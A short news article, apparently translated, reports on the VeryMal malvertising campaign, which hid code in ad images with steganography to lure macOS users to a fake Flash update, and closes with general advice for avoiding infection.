Steganography is a practice used for centuries to hide messages or information encrypted in public images or texts. Now, this technique has also been used by hackers to spread VeryMal, a virtual pest that installs fake advertisements on computers running macOS from a fake Flash update, to which the user is taken by a fairly bold method.
The malware is delivered from legitimate propaganda services hired by hackers to ensure the spread of the pest. From the hidden image, the plague checks if the standard macOS fonts are installed, as is the case with most machines. With the positive, a malicious code generation process starts, one character at a time, until it is executed and takes the victim to a fake Flash update page. If the download is successful, the computer is infected.
The old-fashioned method was found by hackers to avoid detection by anti-virus software or barriers posed by the macOS itself. Infected computers start to display fake ads, whose revenue goes directly to hackers, even replacing legitimate ads on websites, which makes it harder to detect that something is wrong.
VeryMal is already an ancient pest known to security experts, but the new distribution method has increased its reach. According to researcher Eliya Stein, of Confiant, responsible for the discovery of the pest, in just two days at least five million people have had contact with the malicious ads. Users in the United States were the main targets, but the expert is not sure how many were affected by the malware.
The infection campaign ended as quickly as it started, either by the expiration of advertising agreements with the distributors or by the detection that something was wrong, which led to the suspension of the advertisements. Still, pretty damage may already have been done, which has led Confiant to indicate care primarily to residents in the United States.
Paying attention to seemingly out-of-place ads or weird advertisements, not necessarily related to users’ habits, is a good way to identify a possible infection. Keeping security solutions and applications up-to-date is also a good way to avoid such solutions, as well as avoiding clicking on suspicious ads and installing updates that are suddenly displayed through the browser.